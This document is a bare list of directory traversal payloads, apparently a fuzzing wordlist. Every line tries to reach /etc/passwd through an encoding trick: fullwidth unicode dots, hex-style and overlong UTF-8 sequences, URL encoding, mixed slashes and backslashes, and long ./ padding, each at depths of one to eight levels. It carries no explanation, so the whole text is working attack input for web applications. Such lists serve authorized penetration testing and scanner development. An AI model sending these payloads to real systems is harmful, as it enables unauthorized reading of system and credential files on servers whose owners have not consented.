%uff0e%uff0e%u2216%uff0e%uff0e%u2216/etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216/etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216/etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216/etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216/etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216/etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216/etc/passwd
..0x2f/etc/passwd
..0x2f..0x2f/etc/passwd
..0x2f..0x2f..0x2f/etc/passwd
..0x2f..0x2f..0x2f..0x2f/etc/passwd
..0x2f..0x2f..0x2f..0x2f..0x2f/etc/passwd
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f/etc/passwd
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f/etc/passwd
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f/etc/passwd
0x2e0x2e//etc/passwd
0x2e0x2e/0x2e0x2e//etc/passwd
0x2e0x2e/0x2e0x2e/0x2e0x2e//etc/passwd
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e//etc/passwd
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e//etc/passwd
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e//etc/passwd
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e//etc/passwd
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e//etc/passwd
0x2e0x2e0x2f/etc/passwd
0x2e0x2e0x2f0x2e0x2e0x2f/etc/passwd
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f/etc/passwd
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f/etc/passwd
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f/etc/passwd
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f/etc/passwd
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f/etc/passwd
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f/etc/passwd
..0x5c/etc/passwd
..0x5c..0x5c/etc/passwd
..0x5c..0x5c..0x5c/etc/passwd
..0x5c..0x5c..0x5c..0x5c/etc/passwd
..0x5c..0x5c..0x5c..0x5c..0x5c/etc/passwd
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c/etc/passwd
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c/etc/passwd
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c/etc/passwd
0x2e0x2e\/etc/passwd
0x2e0x2e\0x2e0x2e\/etc/passwd
0x2e0x2e\0x2e0x2e\0x2e0x2e\/etc/passwd
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\/etc/passwd
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\/etc/passwd
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\/etc/passwd
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\/etc/passwd
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\/etc/passwd
0x2e0x2e0x5c/etc/passwd
0x2e0x2e0x5c0x2e0x2e0x5c/etc/passwd
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c/etc/passwd
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c/etc/passwd
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c/etc/passwd
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c/etc/passwd
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c/etc/passwd
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c/etc/passwd
..%c0%2f/etc/passwd
..%c0%2f..%c0%2f/etc/passwd
..%c0%2f..%c0%2f..%c0%2f/etc/passwd
..%c0%2f..%c0%2f..%c0%2f..%c0%2f/etc/passwd
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f/etc/passwd
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f/etc/passwd
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f/etc/passwd
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f/etc/passwd
%c0%2e%c0%2e//etc/passwd
%c0%2e%c0%2e/%c0%2e%c0%2e//etc/passwd
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e//etc/passwd
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e//etc/passwd
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e//etc/passwd
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e//etc/passwd
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e//etc/passwd
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e//etc/passwd
%c0%2e%c0%2e%c0%2f/etc/passwd
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f/etc/passwd
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f/etc/passwd
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f/etc/passwd
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f/etc/passwd
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f/etc/passwd
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f/etc/passwd
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f/etc/passwd
..%c0%5c/etc/passwd
..%c0%5c..%c0%5c/etc/passwd
..%c0%5c..%c0%5c..%c0%5c/etc/passwd
..%c0%5c..%c0%5c..%c0%5c..%c0%5c/etc/passwd
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c/etc/passwd
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c/etc/passwd
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c/etc/passwd
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c/etc/passwd
%c0%2e%c0%2e\/etc/passwd
%c0%2e%c0%2e\%c0%2e%c0%2e\/etc/passwd
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\/etc/passwd
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\/etc/passwd
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\/etc/passwd
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\/etc/passwd
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\/etc/passwd
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\/etc/passwd
%c0%2e%c0%2e%c0%5c/etc/passwd
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c/etc/passwd
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c/etc/passwd
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c/etc/passwd
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c/etc/passwd
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c/etc/passwd
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c/etc/passwd
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c/etc/passwd
///%2e%2e%2f/etc/passwd
///%2e%2e%2f%2e%2e%2f/etc/passwd
///%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
\\\%2e%2e%5c/etc/passwd
\\\%2e%2e%5c%2e%2e%5c/etc/passwd
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
..///etc/passwd
..//..///etc/passwd
..//..//..///etc/passwd
..//..//..//..///etc/passwd
..//..//..//..//..///etc/passwd
..//..//..//..//..//..///etc/passwd
..//..//..//..//..//..//..///etc/passwd
..//..//..//..//..//..//..//..///etc/passwd
..////etc/passwd
..///..////etc/passwd
..///..///..////etc/passwd
..///..///..///..////etc/passwd
..///..///..///..///..////etc/passwd
..///..///..///..///..///..////etc/passwd
..///..///..///..///..///..///..////etc/passwd
..///..///..///..///..///..///..///..////etc/passwd
..\\/etc/passwd
..\\..\\/etc/passwd
..\\..\\..\\/etc/passwd
..\\..\\..\\..\\/etc/passwd
..\\..\\..\\..\\..\\/etc/passwd
..\\..\\..\\..\\..\\..\\/etc/passwd
..\\..\\..\\..\\..\\..\\..\\/etc/passwd
..\\..\\..\\..\\..\\..\\..\\..\\/etc/passwd
..\\\/etc/passwd
..\\\..\\\/etc/passwd
..\\\..\\\..\\\/etc/passwd
..\\\..\\\..\\\..\\\/etc/passwd
..\\\..\\\..\\\..\\\..\\\/etc/passwd
..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd
..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd
./\/.//etc/passwd
./\/././\/.//etc/passwd
./\/././\/././\/.//etc/passwd
./\/././\/././\/././\/.//etc/passwd
./\/././\/././\/././\/././\/.//etc/passwd
./\/././\/././\/././\/././\/././\/.//etc/passwd
./\/././\/././\/././\/././\/././\/././\/.//etc/passwd
./\/././\/././\/././\/././\/././\/././\/././\/.//etc/passwd
.\/\.\/etc/passwd
.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..//etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../..//etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../..//etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../..//etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../..//etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../..//etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../..//etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../..//etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\/etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\/etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\/etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\/etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\/etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\/etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\/etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\/etc/passwd
./..//etc/passwd
./.././..//etc/passwd
./.././.././..//etc/passwd
./.././.././.././..//etc/passwd
./.././.././.././.././..//etc/passwd
./.././.././.././.././.././..//etc/passwd
./.././.././.././.././.././.././..//etc/passwd
./.././.././.././.././.././.././.././..//etc/passwd
.\..\/etc/passwd
.\..\.\..\/etc/passwd
.\..\.\..\.\..\/etc/passwd
.\..\.\..\.\..\.\..\/etc/passwd
.\..\.\..\.\..\.\..\.\..\/etc/passwd
.\..\.\..\.\..\.\..\.\..\.\..\/etc/passwd
.\..\.\..\.\..\.\..\.\..\.\..\.\..\/etc/passwd
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\/etc/passwd
.//..///etc/passwd
.//..//.//..///etc/passwd
.//..//.//..//.//..///etc/passwd
.//..//.//..//.//..//.//..///etc/passwd
.//..//.//..//.//..//.//..//.//..///etc/passwd
.//..//.//..//.//..//.//..//.//..//.//..///etc/passwd
.//..//.//..//.//..//.//..//.//..//.//..//.//..///etc/passwd
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..///etc/passwd
.\\..\\/etc/passwd
.\\..\\.\\..\\/etc/passwd
.\\..\\.\\..\\.\\..\\/etc/passwd
.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd
